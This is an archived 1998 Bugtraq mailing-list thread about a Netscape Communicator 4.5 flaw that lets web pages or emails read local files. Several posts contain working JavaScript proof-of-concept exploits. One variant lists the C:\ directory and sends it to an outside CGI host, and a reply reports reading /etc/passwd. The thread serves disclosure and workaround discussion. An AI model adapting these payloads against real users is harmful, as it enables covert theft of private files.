[ http://www.rootshell.com/ ]

Date: Mon, 23 Nov 1998 10:36:40 PST
From: Georgi Guninski <guninski@HOTMAIL.COM>
Subject: Netscape Communicator 4.5 can read local files

There is a bug in Netscape Communicator 4.5 for Windows 95 and 4.05 for
WinNT 4.0 (probably others) which allows reading files from the user's
computer. It is not necessary the file name to be known, because directories
may be browsed. The contents of the file may be sent to an arbitrary host.
In order this to work, you need both Java and Javascript enabled. The bug
may be exploited by email message.

Demonstration is available at:
http://www.geocities.com/ResearchTriangle/1711/b6.html

Workaround: Disable Javascript or Java.

The Javascript code is:

sl=window.open("wysiwyg://1/file:///C|/");
sl2=sl.window.open();
sl2.location="javascript:s='<SCRIPT>b=\"Here is the beginning of your
file: \";var f = new java.io.File(\"C:\\\\\\\\test.txt\");var fis = new
java.io.FileInputStream(f); i=0; while ( ((a=fis.read()) != -1) &&
(i<100) ) { b += String.fromCharCode(a);i++;}alert(b);</'+'SCRIPT>'";

Regards,
Georgi Guninski
http://www.geocities.com/ResearchTriangle/1711

Date: Mon, 23 Nov 1998 20:49:37 +0000
From: The Spirit of the Black Panther <panther@DSIS.NET>
Subject: Re: Netscape Communicator 4.5 can read local files

I have just tested this bug in Netscape 4.5 on a RedHat Linux 5.1 machine,
Kermel 2.0.34 and with minor patching of the java, it is also effective.  I
was sucessful in retrieving ANY LOCAL FILE with the World readable
attribute. This includes the /etc/passwd file!  In netscape,
Edit>Preferences>Advanced>Disable Javascript in Mail and News will block
this exploit, unless the person has access to your web server.

Date: Tue, 24 Nov 1998 20:23:25 -0800
From: Ryan Russell <Ryan.Russell@SYBASE.COM>
Subject: Re: Netscape Communicator 4.5 can read local files

It's vastly different.  Did you try creating c:\test.txt and putting
something in it, and going to that page?  Notice that it pops the first line
in a dialog box.  That means it has that info under programmatic contol, and
can send it across the network back to the web server, exactly as claimed in
the original advisory.

Contrast that with (you) opening your c: drive with Communicator. You can
browse local files, but only you get to see the contents, and that window
isn't under any kind of programmatic control
>from other windows... at least that's how it's supposed to work.

It's similar to the Java sandbox concept.  Local and signed content are
"trusted" and can do whatever they like, whereas remotely loaded content are
"untrusted" and aren't supposed to be able to perform certain operations. 
When you (well, Netscape and Microsoft) try to mix the two, invariably
mistakes will be made, and leaks will happen between the two.


                         Ryan

----------------------------------------------------------------

Date: Wed, 25 Nov 1998 15:28:45 -0500
From: Terence Christopher Haddock <haddock@UDEL.EDU>
Reply-To: thaddock@poboxes.com
Subject: Re: Netscape Communicator 4.5 can read local files

        This security hole is not limited to knowing a specific file name,
it can be used to list the contents of a directory, which I believe is
much more insidious. This script can send a list of the files in the
user's root directory under windows:

sl=window.open("wysiwyg://1/file://C|/");
sl2=sl.window.open();
sl2.location="javascript:"+
"b=\"Here is the files in your root directory:\";"+
"var f=new java.io.file(\"C:\\\\\");"+
"var files=f.list();"+
"for (var x=0;x<files.length;x++){"+
"b+=files[x]+\"\n\""+
"};"+
"alert(b);";

        (Simple to modify it for UNIX)
        Using a search algorithm the script could search for specific
files by running this recursively. The only problem (from a hacker's
perspective, a good thing from our perspective) is all of the windows it
would open. If a way could be worked around this (which I think it can),
this script could run without a user even knowing it, searching the user's
directories and reporting them to a server.

Sincerely,
Terence C. Haddock

----------------------------------------------------------------

Terence Christopher Haddock (haddock@UDEL.EDU)
Wed, 25 Nov 1998 14:22:12 -0500 


        Ben Collin's file contains the text "this is really stupid.". He's
running an UNIX version of Netscape, so I had to modify the script.
Unfortunately, the following does not work under both UNIX and Windows:

sl=window.open("wysiwyg://1/file://");

        It works under UNIX, but not under Windows. A simple check of the
OS would take care of the distinction, however, so that wouldn't slow any
would-be hackers down. Also, if they know their target, then they know
what kind of OS they're dealing with.

Sincerely,
Terence C. Haddock
University of Delaware

On Wed, 25 Nov 1998, Ben Collins wrote:

> I would just like to say that I find it hard to believe so much fuss has
> been made about this. It is clear that this is only a local 'trick' to
> look like it has gotten info. There used to be earlier versions of this
> where ppl would make a link to file:///C|/ and say they had your hardrive
> contents on their webpage, and now that java/javascript is involved
> everyone is freaking out over the same thing just done a litte more
> elaborately.
>
> If some one here can setup a webpage, send me the URL, have that page read
> the file '/test.txt' from my hardrive and then that person send the
> contents to this list, I will believe. Otherwise I think this whole
> hysteria over 'unforseen' dangers should stop.
>
> --
> -----    -- - -------- --------- ----  -------  -----  - - ---   --------
> Ben Collins <b.m.collins@larc.nasa.gov>                  Debian GNU/Linux
> UnixGroup Admin - Jordan Systems Inc.                 bcollins@debian.org
> ------ -- ----- - - -------   ------- -- The Choice of the GNU Generation

----------------------------------------------------------------

Date: Thu, 26 Nov 1998 12:31:35 +0100
From: Michael Teichmann <teichmann@TECMATH.DE>
To: BUGTRAQ@netspace.org
Subject: Re: Netscape Communicator 4.5 can read local files

> I've whipped up a couple of demos of this bug that send the contents to a
> cgi.  There is a windows version that I know works, and a unix version I
> can't test because my linux box is down (it's a hardware thing).  This is
> for anyone who has doubts....
>
> http://www.kics.bc.ca/~trev/cgi-bin/test.html (Windoze)
>
> http://www.kics.bc.ca/~trev/cgi-bin/test-unix.html (UNIX)
>
> And yes, it can email it to you if you like :)

And if you wish, it can even read your directory structure: (works for
Win, but Unix should be straightforward)

//slight change of Trev's script:
<SCRIPT>
alert("List your files in C:\\ and it will be sent to a cgi script.");

sl=window.open("wysiwyg://1/file:///C|/");
sl2=sl.window.open();
sl2.location="javascript:s='<SCRIPT>b=\"\";var f = new
java.io.File(\"C:\\\\\\\\\"); var fl=f.list(); i=0; while(i < fl.length)
{b += fl[i]+\"\\\\n\";
i++;}w=window.open(\"http://www.kics.bc.ca/~trev/cgi-bin/query_string.cgi?\"+escape(b));</'+'SCRIPT>'";

</SCRIPT>


At least it seems it can not *write* to local files,
I get a security exception when I try that.

----------------------------------------------------------------

Date: Thu, 26 Nov 1998 17:43:31 +0100
From: Norbert Luckhardt <nl@CT.HEISE.DE>
To: BUGTRAQ@netspace.org
Subject: Re: Netscape Communicator 4.5 can read local files

-----BEGIN PGP SIGNED MESSAGE-----

Hi there,

At 19:36 23.11.98 , you wrote:
>There is a bug in Netscape Communicator 4.5 for Windows 95
and 4.05 for
>WinNT 4.0 (probably others)

we just tried it on the Mac - surely the script has to be
adapted since the mac doesn't use drive letters - so if You
don't know the names of the drive you cannot give an
absolute path - but it could work with relative paths:

sl=window.open("wysiwyg://1/file:////");

those 4 slashes show the directory in which netscape is
installed (every extra slash goes one dir up)

it is at least possible to get files from that directory
with:

java.io.File(\"test.txt\")

alas I'm not so firm with JavaScript and thus I did not get
a working code with the quoting for higher dir levels -
earned only JavaScript Errors

but I think this is only my personal problem, isn't it?! ;-)

have fun, Shalom dann,
        NOrbert

--
Norbert Luckhardt   http://www.heise.de/ct/Redaktion/nl/
Redaktion c't       Tel.: +49 511 5352 - 300    Fax: +49 511 5352 - 417
Helstorfer Str. 7   D-30625 Hannover            BBS: +49 511 5352 - 301